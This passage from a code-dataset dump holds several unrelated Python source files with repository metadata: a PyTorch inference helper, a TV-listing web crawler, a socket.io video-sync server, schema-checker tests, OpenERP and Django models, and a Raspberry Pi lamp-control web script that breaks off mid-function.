        trans: [pytorch transforms] transforms applied to the image before inference.
    Outputs:
        (pred, score): predicted class index and that class's raw output value.
    '''
    if input_image_path.endswith('dcm'):
        target_img = dicom_to_pil(input_image_path)
    else:
        # BUGFIX: previously opened the undefined name `test_image_name`,
        # which raised NameError for every non-DICOM input.
        target_img = Image.open(input_image_path).convert('RGB')
    target_img_tensor = trans(target_img)
    # NOTE(review): unsqueeze(1) turns a (C, H, W) tensor into (C, 1, H, W);
    # for single-channel DICOM input this doubles as a batch dimension.
    # Presumably intentional for this model -- confirm against training input shape.
    target_img_tensor = target_img_tensor.unsqueeze(1)
    with torch.no_grad():
        model.to('cpu')
        # BUGFIX: Tensor.to() is not in-place; the result must be re-assigned
        # (the previous bare call was a no-op).
        target_img_tensor = target_img_tensor.to('cpu')
        model.eval()
        out = model(target_img_tensor)
        # ps = torch.exp(out)  # enable if the model emits log-probabilities
        ps = out
        prediction_percentages = (ps.cpu().numpy()[0]).tolist()
        pred = prediction_percentages.index(max(prediction_percentages))
        return (pred, max(prediction_percentages))
##
| [
"elbanan@users.noreply.github.com"
] | elbanan@users.noreply.github.com |
d10573b862a65a0fa585fef8597f971ce8d98620 | 05f24247db7c9f0ce7d7fc7f413ba5dbd65fae83 | /Web_crawler/Web_Crawler.py | 2bfab58800c557cfa6ff65d7c4008b8b31d6dfbb | [] | no_license | metal32/Algorithm | eb486df62bd7857f0959a5c2100f8225d37cad98 | 7955f0c448cf69a7ff3474e9a5e579a33c936aa2 | refs/heads/master | 2021-01-21T05:05:16.893701 | 2017-03-18T02:03:38 | 2017-03-18T02:03:38 | 83,125,121 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,279 | py | '''
Created on 18-Mar-2017
@author: ayush
'''
import requests
from bs4 import BeautifulSoup
import webbrowser
import re
def removeComments(string):
    """Return *string* with HTML/SGML tags and stray '--->' markers removed."""
    # DOTALL lets the non-greedy tag pattern span line breaks.
    tag_re = re.compile("<.*?>", re.DOTALL)
    marker_re = re.compile("--->.*?", re.DOTALL)
    stripped = tag_re.sub("", string)
    return marker_re.sub("", stripped)
def trade_spider(maxpages):
    # Crawl up to `maxpages` listing pages of the cyro.se TV-series index and
    # return two dicts keyed by series title: {title: link} and
    # {title: plain-text description}.  Python 2 code (print statements).
    # NOTE(review): `dict` shadows the builtin; harmless here, rename when touched.
    page=1
    dict={}
    desc={}
    while page<=maxpages:
        url='http://cyro.se/tvseries/index.php?&page='+str(page)
        sourcecode=requests.get(url)
        plain_text=sourcecode.text
        soup=BeautifulSoup(plain_text)
        for link in soup.find_all('td',{'class':'topic_content'}):
            href='http://cyro.se/tvseries/'+link.find('a')['href']
            # The slug looks like '<a>-<b>-<title words...>': drop the first
            # two segments and rejoin the remainder as the display title.
            name=link.find('a')['href'].split('-')
            title=' '.join(map(str,name[2:]))
            print title
            # renderContents() yields raw markup; removeComments() strips tags.
            descr=link.find('div',{'class':'imgWrap'}).renderContents()
            final_descr= removeComments(descr).strip()
            print final_descr
            print 'The link for visiting the Tv-series is given below'
            print href
            print '\n\n'
            dict[title]=href
            desc[title]=final_descr
        page+=1
    return dict,desc
dict,desc= trade_spider(3)
print dict.keys() | [
"ayus097836@gmail.com"
] | ayus097836@gmail.com |
6027cfd9f560f466afa4aa586c1d2c4e8d252768 | 2ff18a1fc1df5b9d81e4568694110f776d57aada | /anaconda_env/webapp/bin/sphinx-apidoc | fb5df790c6f30de0bb21c16ff5385ab5af4fe5c9 | [] | no_license | tacNakadai/my1stDjango | 318ea813956c3d2da1313e1771b4d92397796449 | 004d04fae8ea4d53ebe499a513e8fb50ebd7ae0d | refs/heads/master | 2022-10-17T13:39:02.211063 | 2017-08-20T06:21:12 | 2017-08-20T06:21:12 | 100,841,395 | 0 | 1 | null | 2022-10-05T21:30:46 | 2017-08-20T05:49:10 | Python | UTF-8 | Python | false | false | 156 | #!/Users/tac_nakadai/anaconda/envs/webapp/bin/python
if __name__ == '__main__':
    # Console-script shim generated for the virtualenv: delegate straight to
    # Sphinx's apidoc CLI and exit with whatever status it returns.
    import sys
    import sphinx.apidoc
    sys.exit(sphinx.apidoc.main())
| [
"tac.nakadai@me.com"
] | tac.nakadai@me.com | |
e20d0df92b8c34eda198bef61f110eae0f111527 | bf365949bcfe5a62bf11bc86d37b3caf27115f24 | /src/backend/main.py | 127580b39163fec80da870b8bb3227d63b7b642c | [
"MIT"
] | permissive | jcentauri/WatchTogether | 4895660615fa64596959a2fbbe1951793c3c3c43 | 56ce93c9d1bfe1066817efb8cd9ecc1bd95d468e | refs/heads/master | 2020-12-10T07:35:46.110423 | 2020-01-14T07:16:45 | 2020-01-14T07:16:45 | 233,536,813 | 0 | 0 | MIT | 2020-01-13T07:29:40 | 2020-01-13T07:29:39 | null | UTF-8 | Python | false | false | 2,369 | py | import html
from datetime import datetime
import socketio
sio = socketio.Server()
connections = []
usernames = {}
roomusers = {}
@sio.on('connect')
def connect(sid, environ):
    """Register a newly connected socket and log the connection count."""
    # `environ` is part of the socket.io handler signature but unused here.
    sid_key = str(sid)
    print('connect ', sid)
    connections.append(sid_key)
    print('connected sockets: ', len(connections))
@sio.on('join room')
def join_room(sid, roomnum, username="Unknown"):
    """Move the client into `roomnum` (leaving all current rooms), record its
    HTML-escaped display name, and broadcast the room's updated user list."""
    for room in sio.rooms(sid):
        sio.leave_room(sid, room)
    key = str(sid)
    usernames[key] = html.escape(str(username))
    sio.enter_room(sid, roomnum)
    room = str(sio.rooms(sid)[0])
    # setdefault replaces the old fragile `type(...) == list` check and
    # creates the member list on first use.
    roomusers.setdefault(room, []).append(usernames.get(key, "Unknown"))
    sio.emit('get users', roomusers.get(room), room=room)
@sio.on('send message')
def send_message(sid, message):
    """Broadcast an HTML-escaped chat message, with sender name and UTC
    timestamp, to everyone in the sender's current room."""
    sender = usernames.get(str(sid))
    stamp = datetime.utcnow().strftime("%Y-%m-%d %H:%M:%S UTC")
    payload = {"user": sender, "msg": html.escape(message), "time": stamp}
    sio.emit('new message', payload, room=sio.rooms(sid)[0])
@sio.on('play video')
def play_video(sid, data):
    """Relay a play/pause state change to every client in the sender's room."""
    current_room = str(sio.rooms(sid)[0])
    payload = {"state": data.get("state", "")}
    sio.emit('play video client', payload, room=current_room)
@sio.on('sync video')
def sync_video(sid, data):
    """Relay playback time, state and video id so clients can resynchronise."""
    current_room = str(sio.rooms(sid)[0])
    payload = {field: data.get(field) for field in ("time", "state", "videoId")}
    sio.emit('sync video client', payload, room=current_room)
@sio.on('change video')
def change_video(sid, data):
    """Tell every client in the sender's room to load a different video."""
    current_room = str(sio.rooms(sid)[0])
    payload = {"videoId": data.get("videoId")}
    sio.emit('change video client', payload, room=current_room)
@sio.on('')
def fname(sid):
    # Placeholder handler: the event name and body were never filled in.
    pass
@sio.on('')
def fname(sid):
    # Second identical placeholder; note it rebinds the module-level name
    # `fname`, so only this function object survives under that name.
    pass
@sio.on('disconnect')
def disconnect(sid):
    """Remove a departing client from its room's user list, the username map
    and the connection list, then log the new connection count."""
    key = str(sid)
    room = str(sio.rooms(sid)[0])
    if room in roomusers:
        name = usernames.get(key)
        # Guard: a client that connected but never joined has no username
        # entry; the old bare list.remove() raised ValueError here.
        if name in roomusers[room]:
            roomusers[room].remove(name)
        sio.emit('get users', roomusers.get(room), room=room)
    for uroom in sio.rooms(sid):
        sio.leave_room(sid, uroom)
    # pop(..., None) replaces `del` so an unknown sid cannot raise KeyError.
    usernames.pop(key, None)
    if key in connections:
        connections.remove(key)
    print('disconnect ', sid)
    print('connected sockets: ', len(connections))
| [
"maik@maik.dev"
] | maik@maik.dev |
413bdf4b551bce587c18a97aa35b487551e703a6 | f255423c6a1edd99a37d8b9d66ee481283409fc8 | /vaip/tests/checker.py | aa42f9bb834ce7bf0a043122c8f1572229ecc43e | [
"MIT"
] | permissive | dacav/vaip | d7cf7e9c2c103d9bf842f8b84075e85796c831e2 | 5d0805fa72f27a6510ab4eef5cbc6fd419831e9a | refs/heads/master | 2021-05-07T08:39:40.057226 | 2015-05-21T14:26:23 | 2015-05-21T14:26:23 | 109,367,693 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,457 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# --- Battery included modules -------------------------------------------
import unittest as ut
# --- Locally installed modules -----------------------------------------
# --- Program internal modules -------------------------------------------
from vaip import (
checker,
errors,
)
# ------------------------------------------------------------------------
class Tests(ut.TestCase):
    """Checker behaviour: entry visibility, optional fields, value ranges."""
    @classmethod
    def setUpClass(clz):
        clz.ck = checker.Checker('''
            type uid : string matching /^[0-9a-f]+$/;
            entry type user : (
                uid : uid,
                name : string optional,
                age : int(0, *) optional,
                geek : bool optional
            );
            entry type counters : array (*, 9) of real (0, 1)
        ''')
    def test_noentry(self):
        """Types not marked `entry` are not reachable by name."""
        with self.assertRaises(errors.UnboundTypeError):
            Tests.ck['uid']
    def test_optional_nested_match(self):
        """Only the non-optional `uid` field is mandatory, and it must match."""
        user_ck = Tests.ck.user
        with self.assertRaises(errors.InputError):
            user_ck(dict(name = 'lol')) # No uid
        with self.assertRaises(errors.InputError):
            user_ck(dict(uid = 100))
        with self.assertRaises(errors.InputError):
            user_ck(dict(uid = 'fudge'))
        user_ck(dict(uid = 'fde'))
    def test_int_range(self):
        """`age` accepts any non-negative int and rejects negatives."""
        user_ck = Tests.ck.user
        info = dict(
            uid = '91024abc',
            age = 100,
        )
        user_ck(info)
        info['age'] = -1
        with self.assertRaises(errors.InputError):
            user_ck(info)
    def test_bool(self):
        """`geek` accepts real booleans only (1 is not a bool here)."""
        user_ck = Tests.ck.user
        info = dict(
            uid = '91024abc',
            geek = True
        )
        user_ck(info)
        info['geek'] = 1
        with self.assertRaises(errors.InputError):
            user_ck(info)
        info['geek'] = False
        user_ck(info)
    def test_array_real(self):
        """Element range, element type and array length are all enforced."""
        counters_ck = Tests.ck.counters
        info = [0.1, 0.2, 0.3] * 3
        counters_ck(info)
        info.append(0.1)
        with self.assertRaises(errors.InputError):
            counters_ck(info)
        info.pop()
        info[-1] = 1.1
        with self.assertRaises(errors.InputError):
            counters_ck(info)
        info.pop()
        counters_ck(info)
        info.append('hello')
        with self.assertRaises(errors.InputError):
            counters_ck(info)
    def test_array_length(self):
        """An array longer than its declared maximum (9) must be rejected."""
        counters_ck = Tests.ck.counters
        info = [0.1, 0.2, 0.3] * 3
        counters_ck(info)
        info.append(0.1)
        # BUGFIX: the test previously ended right after the append without
        # asserting anything, so the over-length case was never checked.
        with self.assertRaises(errors.InputError):
            counters_ck(info)
class TestTrace(ut.TestCase):
    """Error traces: InputError must pinpoint the offending path and message."""
    @classmethod
    def setUpClass(clz):
        clz.ck = checker.Checker('''
            entry type pong : array(0,10) of real(14,14.5);
            type sub_bar : (
                pong : pong
            );
            entry type deep : (
                sub : (
                    sub : (
                        foo : int(0, 1),
                        bar : sub_bar optional
                    )
                )
            );
            entry type shallow : array (0, 1) of deep
        ''')
    def verify(self, how, data, exp_trace, exp_message):
        """Run `how(data)`, expect an InputError whose trace equals
        `exp_trace` and whose message contains `exp_message`."""
        try:
            how(data)
        except errors.InputError as e:
            trace = e.trace
            message = str(e)
        else:
            # BUGFIX: was `assert False, ...`, which is silently stripped
            # under `python -O`; self.fail always reports the miss.
            self.fail('No exception?')
        self.assertListEqual(exp_trace, trace)
        self.assertIn(exp_message, message)
    def test_shallow(self):
        self.verify(
            TestTrace.ck.shallow,
            dict(foo=3),
            [], 'Expected list or tuple'
        )
    def test_pong(self):
        tocheck = [14.0, 14.1, 14.2, 14.6, 14.4]
        self.verify(
            TestTrace.ck.pong,
            tocheck,
            [3], 'Invalid x=14.6: required 14 <= x <= 14.5'
        )
        tocheck[3] = 14 # Not a float, still ok
        TestTrace.ck.pong(tocheck)
        self.verify(
            TestTrace.ck.pong,
            tocheck * 3, # Size beyond array boundary.
            [], 'Invalid x=15: required 0 <= x <= 10'
        )
    def test_deep(self):
        tocheck = dict()
        self.verify(TestTrace.ck.deep, tocheck,
            [], 'Missing non-optional field \'sub\''
        )
        tocheck['sub'] = dict()
        self.verify(TestTrace.ck.deep, tocheck,
            ['sub'], 'Missing non-optional field \'sub\''
        )
        tocheck['sub']['sub'] = dict()
        self.verify(TestTrace.ck.deep, tocheck,
            ['sub', 'sub'], 'Missing non-optional field \'foo\''
        )
        tocheck['sub']['sub']['foo'] = 'hello'
        self.verify(TestTrace.ck.deep, tocheck,
            ['sub', 'sub', 'foo'], "Type of 'hello': expecting int, got <class 'str'>"
        )
        tocheck['sub']['sub']['foo'] = 99
        self.verify(TestTrace.ck.deep, tocheck,
            ['sub', 'sub', 'foo'], 'Invalid x=99: required 0 <= x <= 1'
        )
        tocheck['sub']['sub']['foo'] = 1
        TestTrace.ck.deep(tocheck)
        tocheck['sub']['sub']['bar'] = '12'
        self.verify(TestTrace.ck.deep, tocheck,
            ['sub', 'sub', 'bar'], 'Not a mapping'
        )
        tocheck['sub']['sub']['bar'] = dict(
            pong=[14.0, 14.1, 14.2, 14.9]
        )
        self.verify(TestTrace.ck.deep, tocheck,
            ['sub', 'sub', 'bar', 'pong', 3],
            'Invalid x=14.9: required 14 <= x <= 14.5'
        )
| [
"simgidacav@gmail.com"
] | simgidacav@gmail.com |
f013f19660f721d18499c7b32f7f3c887255dbba | dc08b638bc77f80f3701c3266c61bb8e4b13eed1 | /wakf_movable_property.py | 8e6b8347e4f7e46d4dfce74ad69d56701ce6b31e | [] | no_license | wasimmoosa/wakf_registration | 109c53a2291fdaf23663712e74b7a4b6b27fbf06 | eb8e600a8fb4949ebb6a801f52824e76a24b7bb4 | refs/heads/master | 2020-05-29T11:04:45.948382 | 2014-09-09T03:36:03 | 2014-09-09T03:36:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,680 | py | from osv import osv
from osv import fields
class wakf_movableproperty(osv.osv):
    """
    OpenERP model describing a movable wakf (endowment) property:
    its owning wakf, nature, valuation and location details.
    """
    _name = 'wakf.movableproperty'
    _description = 'wakf.movableproperty'
    # Legacy OSV field declarations (pre-"new API" OpenERP style).
    _columns = {
        'wakf_id':fields.many2one('res.partner','Wakf Name',ondelete='set null'),
        'name':fields.char('Name', size=128, required=True),
        'property_nature_id':fields.many2one('wakf.property_nature','Property Nature',ondelete='set null'),
        'expiry_date':fields.date('Expiry Date',required=False),
        'property_assessment':fields.selection((('income','Assessable Property (Income generating)'), ('non-income','Not Assessable Property (Non-Income generating)')),'Property Assessment',required=True),
        'reference_no':fields.char('Reference No',size=8,required=False),
        'value':fields.float('Estimated Value',required=False),
        'valuation_date':fields.date('Valuation Date',required=False),
        'location_property':fields.text('Location',required=True),
        'property_additional_details':fields.text('Additional Info',required=False),
        'property_remarks':fields.text('Remarks',required=False),
    }
# Instantiation registers the model with the OSV pool (legacy convention).
wakf_movableproperty()
class wakf_property_nature(osv.osv):
    # Lookup table for the nature/category of a movable wakf property;
    # referenced by wakf.movableproperty via `property_nature_id`.
    _name='wakf.property_nature'
    _description='wakf.property_nature'
    _columns = {
        'name':fields.char('Name', size=64, required=True),
        'description':fields.text('Description',required=False),
    }
# Instantiation registers the model with the OSV pool (legacy convention).
wakf_property_nature()
| [
"hashir.haris@gmail.com"
] | hashir.haris@gmail.com |
0bf6dccc5d8cccda86f91104420aac8eef269d66 | 6f528583d9738cd793b8efbbc4749f5ce049c833 | /01_ultrabasic2_types.py | 29cdb9342e14248d6d0ba475ad6d5a7312359392 | [
"Apache-2.0"
] | permissive | steffenerickson/humanitiesTutorial | f554ab661ce5746df83f0106fae4e14e29df951e | cdac8c381f13d740503237ee91c8969be812e6d4 | refs/heads/master | 2022-04-17T19:26:55.494473 | 2018-10-26T13:56:31 | 2018-10-26T13:56:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 261 | py | # The basic data types in Python
# String: text in single or double quotes (the two forms are equivalent)
"This is a string"
'This is also a string'
# Integer: whole numbers of arbitrary size
1
2
100000
824825
# Float: numbers with a decimal point
1.0
2.0
3.14159
-120.3
# Boolean: the two truth values
True
False
# NoneType: the single value None, representing "no value"
None # None is falsy in a boolean context (but is a distinct object from False)
# This prints to console
print("hello, world") | [
"p.a.vierthaler@hum.leidenuniv.nl"
] | p.a.vierthaler@hum.leidenuniv.nl |
dca151750953a879a4d51fc7b10ce4e4b724f263 | 84aa6f90e5cf5f2e49a9488c1768f2794cbd50db | /student/101022126/HW2/chaos.py | 8fe9c8a917b02d53f2ed509b34618c3ee9470841 | [] | no_license | u101022119/NTHU10220PHYS290000 | c927bf480df468d7d113e00d764089600b30e69f | 9e0b5d86117666d04e14f29a253f0aeede4a4dbb | refs/heads/master | 2021-01-16T22:07:41.396855 | 2014-06-22T11:43:36 | 2014-06-22T11:43:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 363 | py | # -*- coding: utf-8 -*-
"""
Created on Thu May 01 13:17:59 2014
@author: Administrator
"""
# Logistic-map bifurcation sweep (Python 2 script):
# for each growth rate r in [1, 4] (step 0.01), iterate x <- r*x*(1-x)
# L times from x = 0.5 and record the final x.
L = 1000
r = 1
xlist = []
rlist = []
while r <= 4:
    rlist.append(r)
    x = 0.5
    n = 0
    while n < L:
        x = r * x * (1-x)
        n += 1
    # Only the value after L iterations is kept (transients discarded).
    xlist.append(x)
    r = r + 0.01
print xlist
import matplotlib.pyplot as plt
plt.figure()
plt.plot(rlist,xlist) | [
"s101022126@m101.nthu.edu.tw"
] | s101022126@m101.nthu.edu.tw |
bc11f0e21b86f30cf0b8b0dc4ead10fa67491128 | d45afbb7357a58480baa6fa37a9b412160ff517d | /example/dexterity/page.py | 308acbe2fca7f8723cbef940fd06fbb5c2e0270e | [] | no_license | collective/example.dexterity | 13c179554809905d634b4b23cd335072960cedf0 | bfffcdb490b67f48193b1366b89c971736770893 | refs/heads/master | 2023-03-22T11:29:40.313035 | 2011-04-29T23:25:49 | 2011-04-29T23:25:49 | 2,419,281 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,087 | py | """This interface is used by the example.schemapage type. The interface
below is "real", and you can register views and adapters for it. It
will be populated with schema fields read from page.xml in this
directory when the package is grokked.
It is possible to amend/customise the interface with new fields in addition
to those found in the model file, although without a class we normally can't
promise new methods.
We also register a custom view, called @@view. The template for this is found
in page_templates/view.pt, because this module is called "page.py" and the
view class is called "View". We specify that it is a view for any IPage
(grok.context) and requires the View permission (grok.require).
"""
from five import grok
from plone.directives import form
class IPage(form.Schema):
    """Schema interface for the example.schemapage type; its fields are
    populated from the models/page.xml model when the package is grokked."""
    form.model("models/page.xml")
    # Additional fields can be added here to amend the interface if
    # necessary. However, without a custom class, we usually can't
    # promise new methods.
class View(grok.View):
grok.context(IPage)
grok.require('zope2.View') | [
"optilude@gmail.com"
] | optilude@gmail.com |
b763f4de500585543a11db4aab3254a452c4eceb | 4cf6c3788085972036f62719538f77c8ad0ffbec | /Django-Python VS/env/Scripts/django-admin.py | 62d9f52d057448054ae4ea0e5e2b040de9ad1852 | [] | no_license | Denis-project/Python-Django-VS | fd87e81955867982020b6fa461d30a2a8dd9aab4 | 9654ad65ee7cc62f978226a31b6c2eac5314287b | refs/heads/master | 2023-02-02T11:21:50.566209 | 2020-11-15T10:24:56 | 2020-11-15T10:24:56 | 307,746,135 | 1 | 0 | null | 2020-12-14T17:21:54 | 2020-10-27T15:33:04 | JavaScript | UTF-8 | Python | false | false | 182 | py | #!D:\Django-Python\Django-Python VS\Django-Python VS\env\Scripts\python.exe
from django.core import management
if __name__ == "__main__":
    # Virtualenv django-admin wrapper: hand control to Django's CLI utility.
    management.execute_from_command_line()
| [
"xapples.size@gmail.com"
] | xapples.size@gmail.com |
fea2b58017d84e678eb253c34a82de3e34008733 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2618/60760/320379.py | 98f57acd02e0cec08c8c13985ad1816e3642c974 | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 17 | py | print(1)
print(2) | [
"1069583789@qq.com"
] | 1069583789@qq.com |
20acb60db8694a66ca1b7869ed35e2c28f6b586c | 550292bab2cfb4a727a683cd9c47e137473395a0 | /article/models.py | f9a40d3a30eafbe056e1030ae5bf7f609dfd5f3c | [] | no_license | ProgerB/NewsSite | e7bce3bd7e811867bb844759cd05b992cf92a125 | fadd2d65694f7d399bb6007b33634518dbc629b3 | refs/heads/master | 2023-01-24T23:40:58.185642 | 2020-12-08T14:22:24 | 2020-12-08T14:22:24 | 285,798,151 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,787 | py | from django.db import models
from ckeditor_uploader.fields import RichTextUploadingField
from django.utils.safestring import mark_safe
class Category(models.Model):
    # News category.  NOTE: `status` stores the *string* 'True'/'False',
    # not a boolean; choice labels are Uzbek ('Mavjud' = available,
    # 'Mavjud emas' = not available).
    STATUS = (
        ('True', 'Mavjud'),
        ('False', 'Mavjud emas'),
    )
    title = models.CharField(max_length=50)
    keywords = models.CharField(max_length=255, unique=True)
    description = models.CharField(max_length=255)
    status = models.CharField(max_length=15, choices=STATUS)
    slug = models.SlugField()
    # Timestamps are maintained automatically by Django.
    create_at = models.DateTimeField(auto_now_add=True)
    update_at = models.DateTimeField(auto_now=True)
    def __str__(self):
        # Displayed in the admin and wherever the category renders as text.
        return self.title
class Article(models.Model):
    # A news article.  NOTE: `status` stores the *string* 'True'/'False';
    # labels are Uzbek ('Mavjud' = available, 'Mavjud emas' = not available).
    STATUS = (
        ('True', 'Mavjud'),
        ('False', 'Mavjud emas'),
    )
    category = models.ForeignKey(Category, on_delete=models.CASCADE)
    author = models.CharField(max_length=255, blank=True)
    title = models.CharField(max_length=50, unique=True)
    keywords = models.CharField(max_length=255, unique=True)
    description = RichTextUploadingField()
    image = models.ImageField(blank=True, upload_to='images/')
    status = models.CharField(max_length=15, choices=STATUS)
    slug = models.SlugField()
    # Timestamps are maintained automatically by Django.
    create_at = models.DateTimeField(auto_now_add=True)
    update_at = models.DateTimeField(auto_now=True)
    def __str__(self):
        return self.title
    def image_tag(self):
        # Thumbnail HTML for the admin changelist.
        # NOTE(review): self.image.url raises ValueError when no file is
        # uploaded (the field allows blank=True) -- confirm admin usage.
        return mark_safe('<img src ="{}" height="50">'.format(self.image.url))
    image_tag.short_description = 'Image'
class Images(models.Model):
    # Extra gallery images attached to an article (one-to-many).
    article = models.ForeignKey(Article, on_delete=models.CASCADE)
    title = models.CharField(max_length=255, blank=True)
    image = models.ImageField(blank=True, upload_to='images/')
    def __str__(self):
        return self.title
| [
"xurramovbahrom@mail.ru"
] | xurramovbahrom@mail.ru |
5af037b3c47d5183a68d74f33da7344d8416f2b3 | 7acd7abdef66c6569a26185d939b7438c1aae164 | /listoflists.py | bd4c0fb6d8e637d599410170ad939e96f66cfe37 | [] | no_license | gabriellechen-nyu/Python-INFO1-CE9990 | 3a2a5738862a6ad64920c92e8725546d592aae5c | 00dffa49bdd10ac83c897833b9fb52bcbfee80aa | refs/heads/master | 2020-04-05T14:08:06.572428 | 2017-08-12T16:16:06 | 2017-08-12T16:16:06 | 94,785,074 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,088 | py | """
listoflists.py
Gabrielle Chen
Homework 5
July 13, 2017
"""
import sys
import csv
import urllib.request
url = "https://data.cityofnewyork.us/api/views/xx67-kt59/rows.csv?accessType=DOWNLOAD"
# Download the NYC restaurant-inspection CSV and keep one record per
# restaurant id (fields[0]) whose grade column (fields[14], presumably)
# is "Not Yet Graded" with an inspection date (fields[8], MM/DD/YYYY) in 2017.
try:
    lines = urllib.request.urlopen(url)
except urllib.error.URLError as error:
    print("urllib.error.URLError", error)
    sys.exit(1)
restaurants = []
seen = set()
for line in lines:
    try:
        string = line.decode("utf-8")
    except UnicodeError as unicodeError:
        print(unicodeError)
        sys.exit(1)
    # NOTE(review): parsing one physical line at a time breaks on quoted
    # fields that contain embedded newlines -- confirm the feed never
    # produces them, or pass the whole stream to csv.reader instead.
    reader = csv.reader([string])
    fields = next(reader)
    date = fields[8].split("/")
    if fields[14] == "Not Yet Graded" and date[2] == "2017" and fields[0] not in seen:
        restaurants.append(fields)
        seen.add(fields[0])
lines.close()
def score(line):
    """Sort key for a restaurant record: its second CSV field."""
    return line[1]
if len(restaurants)==0:
    print("All restaurants have been graded in 2017")
else:
    # Sort by the second CSV field, then print one line per restaurant.
    restaurants.sort(key=score)
    for restaurant in restaurants:
        print("{} - {} {}, {}".format(restaurant[1], restaurant[3], restaurant[4], restaurant[2]))
sys.exit(0)
| [
"noreply@github.com"
] | gabriellechen-nyu.noreply@github.com |
f769891c4dc77db751e1f6ea84e4314a12f1373f | bafc56f547e33ddaffbd338556fb0277938cf5b1 | /LAB4/prac42.py | 58a03d601efc56d9c8e748bc89c9554de0d48647 | [] | no_license | LazarusCoder/Problem_Solving_with_Python | 511a56fd7a76bcecbaec0c37073eeecb3385508c | c453f8f8e8f692c611b887e703a6d573921a75af | refs/heads/master | 2022-12-31T12:58:48.601469 | 2020-10-01T08:07:33 | 2020-10-01T08:07:33 | 265,870,343 | 0 | 2 | null | 2020-10-16T14:12:22 | 2020-05-21T14:30:33 | Python | UTF-8 | Python | false | false | 344 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Jan 13 15:20:02 2020
@author: Admin
"""
# Pangram check: the input must contain every letter a-z at least once.
az = set("abcdefghijklmnopqrstuvwxyz")
getstr = input("Enter the String")
# BUGFIX: the old test only compared set *sizes* (len(az) - len(set(getstr)) == 0),
# so any input with 26 distinct characters (digits/punctuation included) passed,
# while capitalised pangrams failed.  Compare letter membership instead,
# case-insensitively.
if az.issubset(set(getstr.lower())):
    print("The String is Pangrams")
else:
    print("The String is Not Pangrams" )
| [
"rudranshjani18@gnu.ac.in"
] | rudranshjani18@gnu.ac.in |
ed354666fd6dc1e0cae906c5773d39328b2816a1 | adb391d43e88ba3c1d7fe755f3876163874c3be4 | /Script.py | 0115695afaba164c4d2124b9fe68f053109b132c | [] | no_license | sundar1988/MasterThesis | 6b55e8eb41bdf358f9813b33c5d95d456a0899c6 | 1704c9eadc05dda65c400578d8a3f6bc87a2d119 | refs/heads/master | 2021-01-20T19:45:48.106382 | 2016-06-26T11:37:38 | 2016-06-26T11:37:38 | 61,986,119 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,150 | py | # -*- coding: utf-8 -*-
##------------------------
##Import
##------------------------
import web
#import sys
import RPi.GPIO as GPIO
import time
import drivePWM # this module is design to set PWM
#import pyfirmata
import time
#from Adafruit_I2C import Adafruit_I2C
#from time import sleep
#import math
##------------------------
##I2C device defination
##------------------------
##address = 0x49 #TSL2561
##i2c = Adafruit_I2C(address)
##control_on = 0x03
##control_off = 0x00
##------------------------
##Defination
##------------------------
##------------------------
##URL defination
##------------------------
urls = (
'/','Root',"/root2","root2",'(/.+)','root1'
)
##------------------------
##Set all GPIO
##------------------------
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
HALL_SENSOR = 23 #RPi pin
ROTARY_ENCODER=25 #RPi pin
GPIO.setup (HALL_SENSOR,GPIO.IN,pull_up_down=GPIO.PUD_DOWN)
GPIO.setup(ROTARY_ENCODER, GPIO.IN, pull_up_down=GPIO.PUD_UP)
##------------------------
##I2C Channel
##------------------------
FrontLampDown=0
FrontLampMid=1
FrontLampUp=2
LampRight=3
LampLeft=4
StreetLamp=5
CableCar=6
##------------------------
##Initialization
##------------------------
counter=0
MaxCounter=1000
rpmCount=-1
rpm=0
##------------------------
## URL handling
##------------------------
Script= web.application(urls, globals())
#render = web.template.render('template/')
##------------------------
##
##------------------------
class Root:
    """web.py handler for '/': drives the model lamps and the cable car.

    Expected query parameters: ?select=<device>&setvalue=<n>, where <n> is
    the required lux level for the lamp commands and a raw PWM pulse
    (0..4096) for 'streetlamp'/'cablecar'/'setcounter'.
    """
    def __init__ (self):
        self.hello = "hello world"
    def GET(self):
        INPUT= web.input(select="", setvalue="")
        command= str (INPUT.select)
        global deValue
        deValue = int (INPUT.setvalue)
        # Each lamp branch maps the requested lux level to a PWM value via
        # its calibration module (LuxPWM*), then drives its PWM channel.
        if command == "frontlampdown":
            import LuxPWMfld
            savedLux=LuxPWMfld.saveLux
            pwmFLD = LuxPWMfld.selectLux(deValue)# deValue is required Lux
            drivePWM.select(0,pwmFLD)
            if pwmFLD !=0:
                return 'Front Down lamp ON, with pwm value:',pwmFLD,'Lux Range:',savedLux[0],'to',savedLux[256]
            else:
                return "Front Down lamp OFF"
        if command == "frontlampmid":
            import LuxPWMflm
            savedLux=LuxPWMflm.saveLux
            pwmFLM = LuxPWMflm.selectLux(deValue)# deValue is required Lux
            drivePWM.select(1,pwmFLM)
            if pwmFLM !=0:
                return 'Front Mid lamp ON, with pwm value:',pwmFLM,'Lux Range:',savedLux[0],'to',savedLux[256]
            else:
                return "Front Mid lamp OFF"
        if command == "frontlampup":
            import LuxPWMflu
            savedLux=LuxPWMflu.saveLux
            pwmFLU = LuxPWMflu.selectLux(deValue)# deValue is required Lux
            drivePWM.select(2,pwmFLU)
            if pwmFLU !=0:
                return 'Front UP lamp ON, with pwm value:',pwmFLU,'Lux Range:',savedLux[0],'to',savedLux[256]
            else:
                return "Front UP lamp OFF"
        if command == "lampright":
            import LuxPWMlr
            savedLux=LuxPWMlr.saveLux
            pwmLR = LuxPWMlr.selectLux(deValue)# deValue is required Lux
            drivePWM.select(3,pwmLR)
            if pwmLR !=0:
